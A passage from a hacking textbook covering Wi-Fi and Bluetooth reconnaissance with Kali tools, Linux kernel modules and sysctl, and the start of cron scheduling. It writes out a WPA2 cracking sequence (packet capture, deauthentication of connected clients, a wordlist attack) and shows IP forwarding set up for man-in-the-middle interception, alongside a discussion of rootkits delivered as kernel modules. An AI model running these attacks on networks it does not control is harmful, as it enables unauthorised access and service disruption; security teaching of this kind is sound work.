The original, Wired Equivalent Privacy (WEP), was badly flawed and
easily cracked. Its replacement, Wi-Fi Protected Access (WPA), was a bit
more secure. Finally, WPA2-PSK, which is much more secure and uses a
preshared key (PSK) that all users share, is now used by nearly all Wi-Fi
APs (except enterprise Wi-Fi). In recent years, the industry has adopted
WPA3 for new APs, which makes it more difficult to crack Wi-Fi
passwords.
Modes Wi-Fi can operate in one of three modes: managed, master, or
monitor. You’ll learn what these modes mean in the following section.
Wireless range In the United States, a Wi-Fi AP must legally broadcast
its signal at an upper limit of 0.5 watts. At this power, it has a normal
range of about 300 feet (100 meters). High-gain antennas can extend this
range to as much as 20 miles.
Frequency Wi-Fi is designed to operate on 2.4 GHz and 5 GHz.
Modern Wi-Fi APs and wireless network cards often use both.
Basic Wireless Commands

In Chapter 3, you were introduced to the basic Linux networking command
ifconfig, which lists each activated network interface on your system along
with some basic statistics, including (most importantly) the IP address of
each interface. Let’s take another look at your results from running ifconfig
and focus on the wireless connections this time. (Please note that if you are
running Kali from a virtual machine, you will need an external USB Wi-Fi
adapter such those from Alfa.)
   kali> ifconfig
   eth0Linkencap:EthernetHWaddr 00:0c:29:ba:82:0f
   inet addr:192:168.181.131 Bcast:192.168.181.25
   --snip--
   lo Linkencap:Local Loopback
   inet addr:127.0.0.1 Mask:255.0.0.0
  --snip--
➊ wlan0 Link encap:EthernetHWaddr 00:c0:ca:3f:ee
The Wi-Fi interface here is shown as wlan0 ➊. In Kali Linux, Wi-Fi
interfaces are usually designated as wlanX, with X representing the number
of that interface. In other words, the first Wi-Fi adapter on your system
would be labeled wlan0, the second wlan1, and so on.
If you just want to see your Wi-Fi interfaces and their statistics, Linux has a
specific command that’s similar to ifconfig but dedicated to wireless. That

command is iwconfig. When you enter it, only your wireless interfaces and
their key data are displayed:
kali> iwconfig
lo    no wireless extensions
wlan0 IEEE 802.11bg  ESSID:off/any
      Mode:Managed  Access Point:Not-Associated  
      Retry short limit:7   RTS  thr:off   Fragme
      Encryption key:off
      Power Management:off
eth0  no wireless extensions
Here, we see just the wireless interfaces, also known as network cards, and
key data about them, including the wireless standard utilized, whether the
ESSID is off, and the mode. The mode has three settings: managed, which
means it is ready to join or has joined an AP; master, which means it is
ready to act as or already is an AP; and monitor, which we’ll discuss a little
later in the chapter. We can also discover whether any client has associated
with it and what its transmit power is, among other things. You can tell from
this example that wlan0 is in the mode required to connect to a Wi-Fi
network, but it is not connected to any network yet. We will revisit this
command again once the wireless interface is connected to a Wi-Fi
network.

If you are not certain which Wi-Fi AP you want to connect to, you can see
all the wireless access points your network card can reach using the iwlist
command. The syntax for iwlist is as follows:
iwlist interface action
You can perform multiple actions with iwlist. For our purposes, we’ll use
the scan action to see all the Wi-Fi APs in your area. (Note that with a
standard antenna, your range will be 300 to 500 feet, but this can be
extended with an inexpensive high-gain antenna.)
kali> iwlist wlan0 scan
wlan0       Scan completed:
            Cell 01 - Address: 88:AD:43:75:B3:82
                      Channel:1
                      Frequency:2.412GHz (Channel
                      Quality=70/70   Signal leve
                      Encryption key:off
                      ESSID:"Hackers-Arise"
--snip--
The output from this command should include all Wi-Fi APs within range
of your wireless interface, along with key data about each AP, such as the
MAC address of the AP, the channel and frequency it is operating on, its

quality, its signal level, whether its encryption key is enabled, and its
ESSID.
You will need the MAC address of the target AP (BSSID), the MAC
address of a client (another wireless network card), and the channel the AP
is operating on in order to perform any kind of hacking, so this is valuable
information.
Another command that is very useful in managing your Wi-Fi connections
is nmcli (or the network manager command line interface). The Linux
daemon that provides a high-level interface for the network interfaces
(including the wireless ones) is known as the network manager. Generally,
Linux users are familiar with this daemon from its graphical user interface,
but it can also be used from the command line.
We can use the nmcli command to view the Wi-Fi APs near you and their
key data, as we did with iwlist, but this command gives us a little more
information. We use it in the format nmcli dev networktype, where dev is short
for devices, and the type (in this case) is wifi, like so:
kali> nmcli dev wifi
*  SSID           MODE    CHAN  RATE           SI
   Hackers-Arise  Infra   1     54 Mbits/s     10
   Xfinitywifi    Infra   1     54 Mbits/s     75
   TPTV1          Infra   11    54 Mbits/s     44

--snip--
In addition to displaying the Wi-Fi APs within range and key data about
them, including the SSID, the mode, the channel, the rate of transfer, the
signal strength, and the security protocols enabled on the device, we can use
nmcli to connect to APs. The syntax to connect to an AP is as follows:
nmcli dev wifi connect AP-SSID password APpassword
So, based on the results from our first command, we know there is an AP
with an SSID of Hackers-Arise. We also know it has WPA1 WPA2 security
(this means that the AP is capable of using both the older WPA1 and the
newer WPA2), which means we will have to provide the password to
connect to the network. Fortunately, as it’s our AP, we know the password is
12345678, so we can enter the following:
kali> nmcli dev wifi connect Hackers-Arise password 12345
Device 'wlan0' successfully activated with '394a5
Try this on a network you know, and then when you have successfully
connected to that wireless AP, run iwconfig again to see what has changed.
Here’s my output from connecting to Hackers-Arise:

kali> iwconfig
lo    no wireless extensions
wlan0 IEEE 802.11bg   ESSID:"Hackers-Arise"
      Mode:Managed   Frequency:2.452GHz Access Po
      Bit Rate=12 Mbs Tx-Power=20 dBm
      Retry short limit:7   RTS  thr:off   Fragme
      Encryption key:off
      Power Management:off
      Link Quality=64/70  Signal level=-46 dBm
      Rx invalid nwid:0 Rx invalid crypt:0 Rx inv
      Tx excessive retries:0  Invalid misc:13  Mi
eth0  no wireless extensions
Note that now iwconfig has indicated that the ESSID is "Hackers-Arise" and
that the AP is operating at a frequency of 2.452 GHz. In a Wi-Fi network, it
is possible for multiple APs to all be part of the same network, so there may
be many APs that make up the Hackers-Arise network. The MAC address
00:25:9C:97:4F:48 is, as you might expect, the MAC of the AP I am
connected to. What type of security a Wi-Fi network uses, whether it is
running at 2.4 GHz or 5 GHz, what its ESSID is, and what the AP’s MAC
address is are all critical pieces of information that are necessary for Wi-Fi
hacking. Now that you know the basic commands, let’s get into some
hacking.

Wi-Fi Recon with aircrack-ng
One of the most popular exploits for new hackers to try is cracking Wi-Fi
access points. As mentioned, before you can even consider attacking a Wi-
Fi AP, you need the MAC address of the target AP (BSSID), the MAC
address of a client, and the channel on which the AP is operating.
We can get all that information and more using tools from the aircrack-ng
suite. I’ve mentioned this suite of Wi-Fi hacking tools a few times before,
and now it’s time to actually use it. This suite of tools is included in every
version of Kali, so you don’t need to download or install anything.
To use these tools effectively, you first need to put your wireless network
card into monitor mode so that the card can see all the traffic passing its
way. Normally, a network card captures only traffic destined specifically for
that card. Monitor mode is similar to promiscuous mode on wired network
cards.
To put your wireless network card in monitor mode, use the airmon-ng
command from the aircrack-ng suite. The syntax for this command is
simple:
sudo airmon-ng start|stop|check interface

So, if you want to put your wireless network card, which is designated
wlan0, into monitor mode, you would enter the following:
kali> sudo airmon-ng start wlan0
Found three processes that could cause trouble
If airodump-ng, aireplay-ng, or airtun-ng stops w
a short period of time, you may want to run 'airm
--snip--
PHY         INTERFACE         DRIVER      Chipset
phy0        wlan0             rt18187     Realtek
    (mac8311 monitor mode vif enabled for [phy0]w
--snip--
The stop and check commands, respectively, stop monitor mode and check
for problems in monitor mode if you run into trouble.
With your wireless card in monitor mode, you can access all the wireless
traffic passing by you within the range of your wireless network adapter and
antenna (standard is about 300 to 500 feet). Note that airmon-ng will rename
your wireless interface: mine has been renamed wlan0mon, though yours

may be different. Make certain to note the new designated name of your
wireless interface because you’ll need that information in the next step.
Now we’ll use another tool from the aircrack-ng suite to find key data from
the wireless traffic. The airodump-ng command captures and displays the key
data from broadcasting APs and any clients connected to those APs or
within the vicinity. The syntax here is straightforward: simply plug in
airodump-ng, followed by the interface name you got from running airmon-ng
just now:
kali> sudo airodump-ng wlan0mon
CH  9][  Elapsed: 28 s ][  2025-02-08 10:27
BSSID              PWR Beacons #Data #/s  CH MB  
01:01:AA:BB:CC:22  -1        4    26   0  10 54e 
--snip--
BSSID               Station             PWR   Rat
(not associated)    01:01:AA:BB:CC:22
01:02:CC:DD:03:CF   A0:A3:E2:44:7C:E5
When you issue this command, your wireless card will pick up crucial
information (listed next) from all the wireless traffic of the APs nearby:

BSSID The MAC address of the AP or client
PWR The strength of the signal
ENC The encryption used to secure the transmission
#Data The data throughput rate
CH The channel on which the AP is operating
ESSID The name of the AP
Note that airodump-ng splits the output screen into an upper and lower
portion. The upper portion has information on the broadcasting APs,
including the BSSID, the power of the AP, how many beacon frames have
been detected, the data throughput rate, how many packets have traversed
the wireless card, the channel (1 to 14), the theoretical throughput limit, the
encryption protocol, the cipher used for encryption, the authentication type,
and the ESSID (commonly referred to as SSID). In the client portion, the
output tells us that one client is not associated, meaning it has been detected
but is not connected to any AP, and that another is associated with a station,
meaning it’s connected to the AP at that address.
Now you have all the information you need to crack the AP! Although it’s
beyond the scope of this book, to crack the wireless AP, you need the client
MAC address, the AP MAC address, the channel on which the target is
operating, and a password list.
To crack the Wi-Fi password, you would open three terminals. In the first
terminal, you would enter commands similar to the following, filling in the

client and AP MAC addresses and the channel:
sudo airodump-ng -c 10 -–bssid  01:01:AA:BB:CC:22 -w Hacke
This command captures all the packets traversing the AP on channel 10
using the -c option.
In another terminal, you can use the aireplay-ng command to knock off
(deauthenticate) anyone connected to the AP and force them to
reauthenticate to the AP, as shown next. When they reauthenticate, you can
capture the hash of their password that is exchanged in the WPA2-PSK
four-way handshake. The password hash will appear in the upper-right
corner of the airodump-ng terminal.
sudo aireplay-ng --deauth 100 -a 01:02:CC:DD:03:CF -c A0:A
Finally, in the final terminal, enter the following:
sudo aircrack-ng -w wordlist.dic -b 01:01:AA:BB:CC:22 Hack
You can use a password list (wordlist.dic) to find the password in the
captured hash (Hackers-ArisePSK.cap).

Detecting and Connecting to Bluetooth
These days, nearly every gadget, mobile device, and system has Bluetooth
built in, including our computers, smartphones, tablets, speakers, game
controllers, keyboards, and many other devices. Being able to hack
Bluetooth can lead to the compromise of any information on the device,
control of the device, and the ability to send unwanted information to and
from the device, among other things.
To exploit the technology, we need to understand how it works. An in-depth
understanding of Bluetooth is beyond the scope of this book, but I will give
you some basic knowledge that will help you scan for and connect to
Bluetooth devices in preparation for hacking them.
How Bluetooth Works
Bluetooth is a universal protocol for low-power, near-field communication
operating at 2.4 GHz to 2.485 GHz using spread spectrum, frequency
hopping at 1,600 hops per second (this frequency hopping is a security
measure). It was developed in 1994 by Ericsson Corp. of Sweden and
named after the 10th-century Danish king Harald “Bluetooth” Gormsson
(note that Sweden and Denmark were a single country in the 10th century).
The Bluetooth specification has a minimum range of 10 meters, but there is
no limit to the upper range manufacturers may implement in their devices.

Many devices have ranges as large as 100 meters. With special antennas,
that range can be extended even farther.
Connecting two Bluetooth devices is referred to as pairing. Pretty much any
two Bluetooth devices can connect to each other, but they can pair only if
they are in discoverable mode. A Bluetooth device in discoverable mode
transmits the following information:
Name
Class
List of services
Technical information
When the two devices pair, they exchange a secret or link key. Each device
stores this link key so it can identify the other in future pairings.
Every device has a unique 48-bit identifier (a MAC-like address) and
usually a manufacturer-assigned name. These will be useful pieces of data
when we want to identify and access a device.
Bluetooth Scanning and Reconnaissance
Linux has an implementation of the Bluetooth protocol stack called BlueZ
that we’ll use to scan for Bluetooth signals. Most Linux distributions,
including Kali Linux, have it installed by default. If yours doesn’t, you can
usually find it in your repository using the following command:

kali> sudo apt install bluez
BlueZ has a number of simple tools we can use to manage and scan
Bluetooth devices, including the following:
hciconfig This tool operates very similarly to ifconfig in Linux, but for
Bluetooth devices. As you can see in Listing 14-1, I have used it to bring
up the Bluetooth interface and query the device for its specs.
hcitool This inquiry tool can provide us with device name, device ID,
device class, and device clock information, which enables the devices to
work synchronously.
hcidump This tool enables us to sniff the Bluetooth communication,
meaning we can capture data sent over the Bluetooth signal.
The first scanning and reconnaissance step with Bluetooth is to check
whether the Bluetooth adapter on the system we’re using is recognized and
enabled so we can use it to scan for other devices. We can do this with the
built-in BlueZ tool hciconfig, as shown in Listing 14-1.
kali> sudo hciconfig
hci0: Type: BR/EDR  Bus: USB
      BD Address: 10:AE:60:58:F1:37  ACL  MTU: 31
      UP RUNNING PSCAN INQUIRY

RX bytes:131433 acl:45 sco:0 events:10519  
      TX bytes:42881  acl:45 sco:0 commands:5081 
Listing 14-1: Scanning for a Bluetooth device
As you can see, my Bluetooth adapter is recognized with a MAC address of
10:AE:60:58:F1:37. This adapter has been named hci0.
The next step is to check that the connection is enabled, which we can also
do with hciconfig by providing the name and the up command:
kali> sudo hciconfig hci0 up
If the command runs successfully, we should see no output, just a new
prompt.
Good, hci0 is up and ready! Let’s put it to work.
Scanning for Bluetooth Devices with hcitool
Now that we know our adapter is up, we can use another tool in the BlueZ
suite called hcitool, which is used to scan for other Bluetooth devices within
range.
Let’s first use the scanning function of this tool to look for Bluetooth
devices that are sending out their discover beacons, meaning they’re in

discovery mode, with the simple scan command shown in Listing 14-2.
kali> sudo hcitool scan
Scanning...
      72:6E:46:65:72:66      ANDROID BT
      22:C5:96:08:5D:32      SCH-I535
Listing 14-2: Scanning for Bluetooth devices in discovery mode
As the output shows, on my system, hcitool found two devices: ANDROID
BT and SCH-I535. Yours will likely provide you with different output
depending on what devices you have around. For testing purposes, try
putting your phone or other Bluetooth device in discovery mode and see if
it gets picked up in the scan.
Now let’s gather more information about the detected devices with the
inquiry function inq:
kali> sudo hcitool inq
Inquiring...
    24:C5:96:08:5D:32    clock offset:0x4e8b     
    76:6F:46:65:72:67    clock offset:0x21c0     
This gives us the MAC addresses of the devices, the clock offset, and the
class of the devices. The class indicates what type of Bluetooth device you

found, and you can look up the code and see what type of device it is by
going to the Bluetooth SIG site at
https://www.bluetooth.com/specifications/assigned-numbers/.
The tool hcitool is a powerful command line interface to the Bluetooth stack
that can do many, many things. Listing 14-3 shows the help page with some
of the commands you can use. Take a look at the help page yourself to see
the full list.
kali> sudo hcitool --help
hcitool - HCI Tool ver 5.50
Usage:
        hcitool [options] <command> [command para
Options:
        --help      Display help
        -i dev      HCI device
Commands
    dev   Display local devices
    inq   Inquire remote devices
    scan  Scan for remote devices
    name  Get name from remote devices
--snip--
Listing 14-3: Some hcitool commands

Many Bluetooth-hacking tools you’ll encounter simply use these commands
in a script, and you can easily create your own tool by using these
commands in your own bash or Python script—we’ll look at scripting in
Chapter 17.
Scanning for Services with sdptool
Service Discovery Protocol (SDP) is a Bluetooth protocol for searching for
Bluetooth services (Bluetooth is a suite of services), and, helpfully, BlueZ
provides the sdptool tool for browsing a device for the services it provides. It
is also important to note that the device does not have to be in discovery
mode to be scanned. The syntax is as follows:
sudo sdptool browse MACaddress
Listing 14-4 shows me using sdptool to search for services on one of the
devices detected earlier in Listing 14-2.
kali> sudo sdptool browse 76:6E:46:63:72:66
Browsing 76:6E:46:63:72:66...
Service RecHandle: 0x10002
Service Class ID List:
  ""(0x1800)
Protocol Descriptor List:
  "L2CAP"  (0x0100)

PSM: 31
  "ATT" (0x0007)
    uint16: 0x0001
    uint16: 0x0005
--snip--
Listing 14-4: Scanning with sdptool
Here, the output shows that the sdptool tool was able to pull information on
all the services this device is capable of using. In particular, we notice that
this device supports the ATT Protocol, which is the Low Energy Attribute
Protocol. It can provide us more clues as to what the device is and possibly
potential avenues to interact with it further.
Seeing Whether the Devices Are Reachable with l2ping
Once we’ve gathered the MAC addresses of all nearby devices, we can send
out pings to these devices, whether they’re in discovery mode or not, to see
whether they are in reach. This lets us know whether they are active and
within range. To send out a ping, we use the l2ping command with the
following syntax:
sudo l2ping MACaddress -c NumberOfPackets

Listing 14-5 shows me pinging the Android device discovered in Listing
14-2.
kali> sudo l2ping 76:6E:46:63:72:66 -c 3
Ping: 76:6E:46:63:72:66 from 10:AE:60:58:F1:37 (d
44 bytes 76:6E:46:63:72:66 id 0 time 37.57ms
44 bytes 76:6E:46:63:72:66 id 1 time 27.23ms
44 bytes 76:6E:46:63:72:66 id 2 time 27.59ms
3 sent, 3 received, 0% loss
Listing 14-5: Pinging a Bluetooth device
This output indicates that the device with the MAC address
76:6E:46:63:72:66 is within range and reachable. This is useful knowledge,
because we must know whether a device is reachable before we even
contemplate hacking it.
Summary
Wireless devices represent the future of connectivity and hacking. Linux
has developed specialized commands for scanning and connecting to Wi-Fi
APs in the first step toward hacking those systems. The aircrack-ng suite of
wireless hacking tools includes both airmon-ng and airodump-ng, which enable
us to scan and gather key information from in-range wireless devices. The

BlueZ suite includes hciconfig, hcitool, and other tools capable of scanning
and information gathering, which are necessary for hacking the Bluetooth
devices within range. It also includes many other tools worth exploring.
Exercises
1. Check your network devices with ifconfig. Note any wireless extensions.
2. Run iwconfig and note any wireless network adapters.
3. Check to see what Wi-Fi APs are in range with iwlist.
4. Check to see what Wi-Fi APs are in range with nmcli. Which do you find
more useful and intuitive, nmcli or iwlist?
5. Connect to your Wi-Fi AP using nmcli.
6. Bring up your Bluetooth adapter with hciconfig and scan for nearby
discoverable Bluetooth devices with hcitool.
7. Test whether those Bluetooth devices are within reachable distance with
l2ping.
OceanofPDF.com

15
MANAGING THE LINUX KERNEL
AND LOADABLE KERNEL
MODULES

All operating systems are made up of at least two major components. The
first and most important of these is the kernel. The kernel is at the center of
the operating system and controls everything the operating system does,
including managing memory, controlling the CPU, and even controlling
what the user sees on the screen. The second element of the operating
system is often referred to as user land and includes nearly everything else.

The kernel is designed to be a protected or privileged area that can only be
accessed by root or other privileged accounts. This is for good reason, as
access to the kernel can provide nearly unfettered access to the operating
system. As a result, most operating systems provide users and services
access only to user land, where the user can access nearly anything they
need without taking control of the operating system.
Access to the kernel allows the user to change how the operating systems
works, looks, and feels. It also allows them to crash the operating system,
making it unworkable. Despite this risk, in some cases, the system admin
must very carefully access the kernel for operational and security reasons.
In this chapter, we’ll examine how to alter the way the kernel works and
add new modules to the kernel. It probably goes without saying that if a
hacker can alter the target’s kernel, they can control the system.
Furthermore, an attacker may need to alter how the kernel functions for
some attacks, such as a man-in-the middle (MITM) attack, where the hacker
places themselves between a client and server and can eavesdrop on or alter
the communication. First, we’ll take a closer look at the kernel structure and
its modules.
What Is a Kernel Module?
The kernel is the central nervous system of your operating system,
controlling everything it does, including managing interactions between

hardware components and starting the necessary services. The kernel
operates between the user applications you see and the hardware that runs
everything, like the CPU, memory, and hard drive.
Linux is a monolithic kernel that enables the addition of kernel modules. As
such, modules can be added and removed from the kernel. The kernel will
occasionally need updating, which might entail installing new device
drivers (such as video cards, Bluetooth devices, or USB devices), filesystem
drivers, and even system extensions. These drivers must be embedded in the
kernel to be fully functional. In some systems, to add a driver, you have to
rebuild, compile, and reboot the entire kernel, but Linux has the capability
of adding some modules to the kernel without going through that entire
process. These modules are referred to as loadable kernel modules, or
LKMs.
LKMs have access to the lowest levels of the kernel by necessity, making
them an incredibly vulnerable target for hackers. A particular type of
malware known as a rootkit embeds itself into the kernel of the operating
systems, often through these LKMs. If malware embeds itself in the kernel,
the hacker can take complete control of the operating system.
If a hacker can get the Linux admin to load a new module to the kernel, the
hacker not only can gain control over the target system but, because they’re
operating at the kernel level of the operating system, can also control what

the target system is reporting in terms of processes, ports, services, hard
drive space, and almost anything else you can think of.
So, if a hacker can successfully tempt a Linux admin into installing a video
or other device driver that has a rootkit embedded in it, the hacker can take
total control of the system and kernel. This is the way some of the most
insidious rootkits take advantage of Linux and other operating systems.
Understanding LKMs is absolutely key to being an effective Linux admin
and being a very effective and stealthy hacker.
Let’s take a look at how the kernel can be managed for good and ill.
Checking the Kernel Version
The first step to understanding the kernel is to check what kernel your
system is running. There are at least two ways to do this. First, we can enter
the following:
kali> uname –a
Linux kali 6.6.9-amd64 #1 SMP PREEMPT_DYNAMIC Kal
The kernel responds by telling us the distribution our OS is running is
Linux Kali, the kernel build is 6.6.9, and the architecture it’s built for is the
x86_64 architecture. It also tells us it has symmetric multiprocessing (SMP)

capabilities (meaning it can run on machines with multiple cores or
processers) and was built on January 8, 2024. Your output may be different,
depending on which kernel was used in your build and the CPU in your
system. This information can be required when you install or load a kernel
driver, so it’s useful to understand how to get it.
One other way to get this information, as well as some other useful
information, is to use the cat command on the /proc/version file, like so:
kali> cat /proc/version
Linux version 6.6.9-amd64 (devel@kali.org) (gcc-1
2.41.50.20231227) #1 SMP PREEMPT_DYNAMIC Kali 6.6
Here you can see that the /proc/version file returned the same information.
Kernel Tuning with sysctl
With the right commands, you can tune your kernel, meaning you can
change memory allocations, enable networking features, and even harden
the kernel against outside attacks.
Modern Linux kernels use the sysctl command to tune kernel options. All
changes you make with sysctl remain in effect only until you reboot the
system. To make any changes permanent, you have to edit the configuration
file for sysctl directly at /etc/sysctl.conf.

A word of warning: you need to be careful when using sysctl because
without the proper knowledge and experience, you can easily make your
system unbootable and unusable. Make sure you’ve considered what you’re
doing carefully before making any permanent changes.
Let’s take a look at the contents of sysctl now. By now, you should
recognize the options we give with the command shown here:
kali> sudo sysctl –a | less
dev.cdrom.autoclose = 1
dev.cdrom.autoeject = 0
dev.cdrom.check_media = 0
dev.cdrom.debug = 0
--snip--
In the output, you should see hundreds of lines of parameters that a Linux
administrator can edit to optimize the kernel. There are a few lines here that
are useful to you as a hacker. As an example of how you might use sysctl,
we’ll look at enabling packet forwarding.
In the man-in-the middle (MITM) attack, the hacker places themselves
between communicating hosts to intercept information. The traffic passes
through the hacker’s system, so they can view and possibly alter the
communication. One way to achieve this routing is to enable packet
forwarding.

If you scroll down a few pages in the output or filter for “ipv4” (sudo sysctl
-a | less | grep ipv4), you should see the following somewhere in the
output:
net.ipv4.ip_dynaddr = 0
net.ipv4.ip_early_demux = 0
net.ipv4.ip_forward = 0
net.ipv4.ip_forward_use_pmtu = 0
--snip--
The line net.ipv4.ip_forward = 0 is the kernel parameter that enables the
kernel to forward on the packets it receives. In other words, the packets it
receives, it sends back out. The default setting is 0, which means that packet
forwarding is disabled.
To enable IP forwarding, change the 0 to a 1 by entering the following:
kali> sudo sysctl -w net.ipv4.ip_forward=1
Remember that that sysctl changes take place at runtime but are lost when
the system is rebooted. To make permanent changes to sysctl, you need to
edit configuration file /etc/sysctl.conf. Let’s change the way the kernel
handles IP forwarding for MITM attacks and make this change permanent.

To enable IP forwarding, open the /etc/sysctl.conf file in any text editor and
uncomment the line for ip_forward. Open /etc/sycstl.conf with any text editor
and take a look:
#/etc/sysctl.conf - Configuration file for settin
# See /etc/sysctl.d/ for additional system variab
# See sysctl.conf (5) for information.
#
#kernel.domainname = example.com
# Uncomment the following to stop low-level messa
#kernel.printk = 3 4 1 3
#################################################
# Functions previously found in netbase
#
# Uncomment the next two lines to enable Spoof pr
# Turn on Source Address Verification in all inte
# prevent some spoofing attacks.
#net.ipv4.conf.default.rp_filter=1
#net.ipv4.conf.all.rp_filter=1
# Uncomment the next line to enable TCP/IP SYN co
# See http://lwn.net/Articles/277146

# Note: This may impact IPv6 TCP sessions too
#net.ipv4.tcp_syncookies=1
See http://lwn.net/Articles/277146/
# Uncomment the next line to enable packet forwar
#net.ipv4.ip_forward=1 ➊
Just remove the comment (#) here to enable IP forwarding ➊.
From an operating system–hardening perspective, you could use this file to
disable ICMP echo requests by adding the line net.ipv4.icmp_echo_ignore_all=1
to make it more difficult—but not impossible—for hackers to find your
system. After adding the line, you will need to run the command sudo sysctl
-p.
Managing Kernel Modules
Linux has at least two ways to manage kernel modules. The older way is to
use a group of commands built around the insmod suite (insmod stands for
insert module and is intended to deal with modules). The second way, using
the modprobe command, we will employ a little later in this chapter. Here, we
use the lsmod command from the insmod suite to list the installed modules in
the kernel:

kali> lsmod
Module                        Size       Used by
nfnetlink_queue               20480      0
nfnetlink_log                 201480     0
nfnetlink                     16384      2 nfnetl
bluetooth                     516096     0
rfkill                        28672      2 blueto
--snip--
As you can see, the lsmod command lists all the kernel modules as well as
information on their size and what other modules may use them. So, for
instance, the nfnetlink module—a message-based protocol for
communicating between the kernel and user space—is 16,384 bytes and
used by both the nfnetlink_log module and the nf_netlink_queue module.
From the insmod suite, we can load or insert a module with insmod and remove
a module with rmmod, which stands for remove module. These commands are
not perfect and may not take into account module dependencies, so using
them can leave your kernel unstable or unusable. As a result, modern
distributions of Linux have now added the modprobe command, which
automatically loads dependencies and makes loading and removing kernel
modules less risky. We’ll cover modprobe in a moment. First, let’s see how to
get more information about our modules.

Finding More Information with modinfo
To learn more about any of the kernel modules, we can use the modinfo
command. The syntax for this command is straightforward: modinfo followed
by the name of the module you want to learn about. For example, if you
wanted to retrieve basic information on the bluetooth kernel module you saw
when you ran the lsmod command earlier, you could enter the following:
kali> modinfo bluetooth
filename:   /lib/modules/4.19.0-kali-amd64/kernel
alias:      net-pf-31
license:    GPL
version:    2.22
description:Bluetooth Core ver 2.22
author:     Marcel Holtman <marcel@holtmann.org>
srcversion: 411D7802CC1783894E0D188
depends:    rfkill, ecdh_generic, crc16
intree:     Y
vermagic:   6.6.9-amd64 SMP preemt mod_unload mod
parm:       disable_esco: Disable eSCO connection
parm:       disable_ertm: Disable enhanced retran
As you can see, the modinfo command reveals significant information about
this kernel module, which is necessary to use Bluetooth on your system.
Note that among many other things, it lists the module dependencies: rfkill,

ecdh_generic, and crc16. Dependencies are modules that must be installed for
the bluetooth module to function properly.
Typically, this is useful information when troubleshooting why a particular
hardware device is not working. Besides noting things like the
dependencies, you can get information about the version of the module and
the version of the kernel the module was developed for and then make sure
they match the version you are running.
Adding and Removing Modules with modprobe
Most newer distributions of Linux, including Kali Linux, include the
modprobe command for LKM management. To add a module to your kernel,
you would use the modprobe command with the -a (add) switch, like so:
kali> sudo modprobe -a module name
To remove a module, use the -r (remove) switch with modprobe followed by
the name of the module:
kali> sudo modprobe -r module to be removed
A major advantage of using modprobe instead of insmod is that modprobe
understands dependencies, options, and installation and removal procedures

and it takes all of these into account before making changes. Thus, it is
easier and safer to add and remove kernel modules with modprobe.
Inserting and Removing a Kernel Module
Let’s try inserting and removing a test module to help you familiarize
yourself with this process. Let’s imagine that you just installed a new video
card and you need to install the drivers for it. Remember, drivers for devices
are usually installed directly into the kernel to give them the necessary
access to function properly. This also makes drivers fertile ground for
malicious hackers to install a rootkit or other listening device.
Let’s assume for demonstration purposes (don’t actually run these
commands) that we want to add a new video driver named
HackersAriseNewVideo. You can add it to your kernel by entering the
following:
kali> sudo modprobe -a HackersAriseNewVideo
To test whether the new module loaded properly, you can run the dmesg
command, which prints out the message buffer from the kernel, and then
filter for “video” and look for any alerts that would indicate a problem:
kali> dmesg | grep video

If there are any kernel messages with the word “video” in them, they will be
displayed here. If nothing appears, there are no messages containing that
keyword.
Then, to remove this same module, you can enter the same command but
with the -r (remove) switch:
kali> sudo modprobe -r HackersAriseNewVideo
Remember, the loadable kernel modules are a convenience to a Linux
user/admin, but they are also a major security weakness and one that
professional hackers should be familiar with. As I said before, the LKMs
can be the perfect vehicle to get your rootkit into the kernel and wreak
havoc!
Summary
The kernel is crucial to the overall operation of the operating system, and as
such, it is a protected area. Anything that’s inadvertently added to the kernel
can disrupt the operating system and even take control of it.
LKMs enable the system administrator to add modules directly into the
kernel without having to rebuild the entire kernel each time they want to
add a module.

If a hacker can convince the system admin to add a malicious LKM, the
hacker can take complete control of the system, often without the system
admin even being aware.
Exercises
1. Check the version of your kernel.
2. List the modules in your kernel.
3. Enable IP forwarding with a sysctl command.
4. Edit your /etc/sysctl.conf file to enable IP forwarding. Now, disable IP
forwarding.
5. Select one kernel module and learn more about it using modinfo.
OceanofPDF.com

16
AUTOMATING TASKS WITH JOB
SCHEDULING

Like anyone using Linux, the hacker often has jobs, scripts or other tasks,
that they want to run periodically. You might, for example, want to schedule
automatic regular file backups of your system, or maybe you want to rotate
logfiles as we did in Chapter 11. The hacker, on the other hand, may also
want to have their system run the MySQLscanner.sh script from Chapter 8
every night or while they’re at work or school. These are all examples of
scheduling automatic jobs. Scheduling jobs allows you to run tasks without
having to think about them, and you can schedule jobs to run when you’re
otherwise not using your system so you have plenty of free resources.
The Linux admin—or the hacker, for that matter—may also want to set
certain scripts or services to start automatically when their system boots up.
In this chapter, you’ll learn more about how to use the cron daemon and
crontab to set up scripts to run automatically, even while the system is
unattended. You’ll also learn how to set up startup scripts that automatically
run whenever the system is booted, which will provide you with the
necessary services that you’ll need to run during your busy day of hacking.
Scheduling an Event or Job to Run on an
Automatic Basis
The cron daemon and the cron table (crontab) are the most useful tools for
scheduling regular tasks. The first, crond, is a daemon that runs in the
background. The cron daemon checks the cron table for which commands to
run at specified times. We can alter the cron table to schedule a task or job to

execute regularly on a particular day or date, at a particular time daily, or
every so many weeks or months.
To schedule these tasks or jobs, enter them into the cron table file, located at
/etc/crontab. The cron table has seven fields: the first five are used to
schedule the time to run the task, the sixth field specifies the user, and the
seventh field is used for the absolute path to the command you want to
execute. If we were using the cron table to schedule a script, we could
simply put the absolute path to the script in the seventh field.
Each of the five time fields represents a different element of time: the
minute, hour, day of the month, month, and day of the week, in that order.
Every element of time must be represented numerically, so March is
represented as 3 (you cannot simply input “March”). Days of the week
begin at 0, which is Sunday, and end at 7, which is also Sunday. Table 16-1
summarizes this.
Table 16-1: Time Representations for Use in the crontab
Field Time unit Representation
1 Minute 0–59
2 Hour 0–23

Field Time unit Representation
3 Day of the month 1–31
4 Month 1–12
5 Day of the week 0–7
So, if we had written a script to scan the globe for vulnerable open ports
and wanted it to run every night at 2:30 AM, Monday through Friday, we
could schedule it in the crontab file. We will walk through the process of
how to get this information into the crontab shortly, but first let’s discuss
the format we need to follow, shown in Listing 16-1.
M  H  DOM  MON  DOW  USER  COMMAND
30 2  *    *    1-5  root  /root/myscanningscript
Listing 16-1: The format for scheduling commands
The crontab file helpfully labels the columns for you. Note that the first
field provides the minute (30), the second field provides the hour (2), the
fifth field provides the days (1-5, or Monday through Friday), the sixth field
defines the user (root), and the seventh field is the path to the script. The

third and fourth fields contain asterisks (*) because we want this script to
run every day Monday through Friday regardless of the day of the month or
the month.
In Listing 16-1, the fifth field defines a range for the day of the week by
using a dash (-) between the numbers. If you want to execute a script on
multiple noncontiguous days of the week, you can separate those days with
commas (,). Thus, Tuesday and Thursday would be 2,4.
